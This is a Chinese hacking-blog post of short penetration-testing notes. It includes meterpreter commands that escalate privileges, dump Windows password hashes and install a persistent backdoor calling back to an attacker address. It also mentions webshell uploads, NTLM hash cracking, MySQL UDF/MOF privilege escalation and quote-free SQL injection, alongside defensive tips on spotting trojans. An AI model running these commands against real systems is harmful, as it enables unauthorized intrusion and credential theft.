记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

[渗透笔记_广外安全小组](肆)

2013-12-10 09:30
我们新开的栏目:【学习笔记】 旨在与小伙伴们分享小编们的学习心得,逆向笔记连载由91ri网络安全研究室的小编们带来,主要为一些短小但又精华的渗透小技巧,这些技巧都是由小编 们在平时读书、学习的时候积累的一些小技巧,初定为每周更新一次。为保证质量,每一篇为20条左右的渗透小记。同时欢迎其他同学们投稿给我们你的笔记与大家分享~
 
1、在Webshell中,如果上传文件时提示缺少对象。可以尝试写一句话,用菜刀连接之后用菜刀上传文件。
 
 
 
2、使用meterpreter的hashdump提取windows口令的哈希值:
 
 

meterpreter > getuid //获知当前权限级别

meterpreter > getsystem //提升权限

meterpreter > run hashdump

 

3、网站http://www.md5decrypter.co.uk/,可提供对NTLM/LM hash值的在线解密(小编注:这个网站破解MD5的命中率也很高哦)。
 
 
 
3、使用meterpreter建立后门:
 
 

meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1

-A参数用于在攻击方机器上自动启动监听程序。

-S参数表示将后门程序设置为Windows系统启动时加载。

-U参数表示后门设置为用户登陆系统时自动执行。

-i参数用于设置后门回连到代理处理程序的时间间隔

-p是端口号 -r是目标机器的ip地址

 

 
4、网络纵深防御思想:作为一个公司,它会为物理线路聘用一个巡线员(第一层),在工作组交换机上做端口安全(第二层),在边界路由器上做访问列表(第三层),在防火墙中建立DMZ区和包过滤(第四层),设置IDS/IDP监测/阻拦(第三至七层),建立SSL通道(第六层),设置内容过滤(第七层),提供AAA服务(第七层),进行漏洞扫描(第四至七层)和病毒扫描(第七层)等。
 
——摘自《IT安全面试攻略》
 
 
 
5、IPS设备可以提供攻击检测和防御两种功能,如果以镜像方式接入,就使用反应机制;如果以串行方式接入,就使用阻断机制。
 
6、根据ip获知对方电脑的名称:ping  -a  ip地址,
 
如:ping  -a  192.168.235.253
 
7、在系统“windows”文件夹下,点击打开“system.ini”文件,在代码中如果有[boot]代码,其中shell语句的格式一般为“shell=文件名”,如果后面还跟有一个文件名(如shell=文件名+文件名),则很可能是木马程序。
 
 
 
8、在系统“windows”文件夹下,点击打开“win.ini”文件,在代码中如果有“run=?”或者“load=?”代码类型,一定要注意其后的文件。一般情况下,“run=”和“load=”后面就没有内容了,如果有路径或不熟悉的文件名,可能就是木马程序。
 
 
 
9、木马隐藏的方式很多,一般都隐藏在注册表的
 
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
 
目录下。查看键值中有没有不熟悉的可执行文件,该类文件可能就是木马程序。
 
 
 
10、专门捕获网页的嗅探器——艾菲网页侦探:艾菲网页侦探是一个HTTP协议的网络嗅探器,专门捕捉局域网中含有HTTP协议的数据包,并对其进行分析,找出符合过滤器的那些HTTP通信内容。
 
 
 
11、常见的windows XP系统漏洞:RDP漏洞、远程明文账户名传送漏洞、UPnP缓冲溢出漏洞、热键漏洞、拒绝服务漏洞
 
 
 
12、常见window 7系统漏洞:内核驱动程序中的漏洞、辅助驱动程序中的漏洞、IE的积累性安全更新漏洞、颜色控制面板中的漏洞、.NET和Silverlight中的漏洞、SharePoint中的漏洞。
 
 
 
13、清除BIOS密码之魔法攻击法:如果你能进入系统,可以用BiosPwds、CmosPwd等软件清除。(小编注:一般就别想了)
 
 
 
14、清除BIOS密码之物理攻击法:关闭电源,将主板上的正确跳线帽用专业工具挑出,将跳线帽由原来标示为“1”、“2”针脚套在标示为“2”、“3”的针脚上,再将跳线帽复原,打开电源,即可发现BIOS密码已清除。如果遇到较老的机子,可是拆掉电池、再用导电工具短接清除密码。
 
 
 
15、mysql数据库拥有读写文件权限时,成功写入文件的条件需单引号不转义、不可覆盖已存在文件、必须为最后一条语句。因此magic_quotes_gpc必须为0ff。
 
 
 
16、渗透提权过程中,得知mysql数据库连接账号和密码时可以尝试UDF方式提权,前提是系统必须为windows。当然如果权限高的话,还可以使用mof写入系统的方式提权。
 
 
 
17、渗透过程中如目标开启rsync服务,默认873端口,可尝试无口令登录,权限设置不足的可直接上传文件,最不济也可查看目标站点文件。
 
 
 
18、端口转发时如果lcx不起作用,可尝试reduh这个工具,不过速度稍微有点捉急!(其实那速度会让你有砸键盘的冲动)
 
 
 
19、数字型注入中,无单引号注入方法有两种,一种是定义注入字符串为16进制赋值变量@r,然后exec(@r)执行;另外一种是使用char()函数和“+”号来进行。
 
本文为学习笔记,作者为91ri.org团队

知识来源: www.2cto.com/Article/201312/263565.html

阅读:95796 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“[渗透笔记_广外安全小组](肆)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云

本页关键词